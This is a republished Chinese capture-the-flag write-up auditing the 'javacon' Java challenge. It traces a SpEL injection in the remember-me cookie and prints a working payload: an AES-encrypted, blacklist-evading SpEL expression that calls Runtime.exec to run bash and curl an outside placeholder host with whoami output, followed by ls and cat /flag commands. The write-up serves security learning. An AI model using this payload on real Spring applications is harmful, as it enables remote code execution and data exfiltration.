[Java代码审计]javacon WriteUp
Posted Y4tacker
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[Java代码审计]javacon WriteUp相关的知识,希望对你有一定的参考价值。
写在前面
在P神星球看到的,这里学习一下,文件在https://www.leavesongs.com/media/attachment/2018/11/23/challenge-0.0.1-SNAPSHOT.jar
javacon
运行的时候利用java -jar challenge-0.0.1-SNAPSHOT.jar
首先查看配置
首先在登录页面,在login页面post接收参数,与配置当中的比对,成功则设置cookie
@PostMapping({"/login"})
public String login(@RequestParam(value = "username",required = true) String username, @RequestParam(value = "password",required = true) String password, @RequestParam(value = "remember-me",required = false) String isRemember, HttpSession session, HttpServletResponse response) {
if (this.userConfig.getUsername().contentEquals(username) && this.userConfig.getPassword().contentEquals(password)) {
session.setAttribute("username", username);
if (isRemember != null && !isRemember.equals("")) {
Cookie c = new Cookie("remember-me", this.userConfig.encryptRememberMe());
c.setMaxAge(2592000);
response.addCookie(c);
}
return "redirect:/";
} else {
return "redirect:/login-error";
}
}
选中RememberMe之后登录,成功进入
我们看看这里进行的操作,首先获取remember-me参数
查看函数getAdvanceValue
首先这里将接收的参数并与黑名单进行比对,如果匹配成功则抛出错误
如果没有匹配到则进行正常流程,在SmallEvaluationContext进行SpEL表达式解析。注意,这里就存在SPEl表达式注入
因此我们只需要绕过黑名单构造参数即可
class Encryptor {
static Logger logger = LoggerFactory.getLogger(Encryptor.class);
public Encryptor() {
}
public static String encrypt(String key, String initVector, String value) {
try {
IvParameterSpec iv = new IvParameterSpec(initVector.getBytes("UTF-8"));
SecretKeySpec skeySpec = new SecretKeySpec(key.getBytes("UTF-8"), "AES");
Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5PADDING");
cipher.init(1, skeySpec, iv);
byte[] encrypted = cipher.doFinal(value.getBytes());
return Base64.getUrlEncoder().encodeToString(encrypted);
} catch (Exception var7) {
logger.warn(var7.getMessage());
return null;
}
}
public static String decrypt(String key, String initVector, String encrypted) {
try {
IvParameterSpec iv = new IvParameterSpec(initVector.getBytes("UTF-8"));
SecretKeySpec skeySpec = new SecretKeySpec(key.getBytes("UTF-8"), "AES");
Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5PADDING");
cipher.init(2, skeySpec, iv);
byte[] original = cipher.doFinal(Base64.getUrlDecoder().decode(encrypted));
return new String(original);
} catch (Exception var7) {
logger.warn(var7.getMessage());
return null;
}
}
}
public class RMIServer {
public static void main(String[] args) throws IOException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, IllegalAccessException, InstantiationException {
System.out.println(Encryptor.encrypt("c0dehack1nghere1", "0123456789abcdef", "#{T(String).getClass().forName(\\"java.l\\"+\\"ang.Ru\\"+\\"ntime\\").getMethod(\\"ex\\"+\\"ec\\",T(String[])).invoke(T(String).getClass().forName(\\"java.l\\"+\\"ang.Ru\\"+\\"ntime\\").getMethod(\\"getRu\\"+\\"ntime\\").invoke(T(String).getClass().forName(\\"java.l\\"+\\"ang.Ru\\"+\\"ntime\\")),new String[]{\\"/bin/bash\\",\\"-c\\",\\"curl http://xxx?a=`whoami`\\"})}"));
}
}
成功拿到
看看根目录使用ls /|base64防止遇到空格以后被截断
通过cat /flag获取到flag
以上是关于[Java代码审计]javacon WriteUp的主要内容,如果未能解决你的问题,请参考以下文章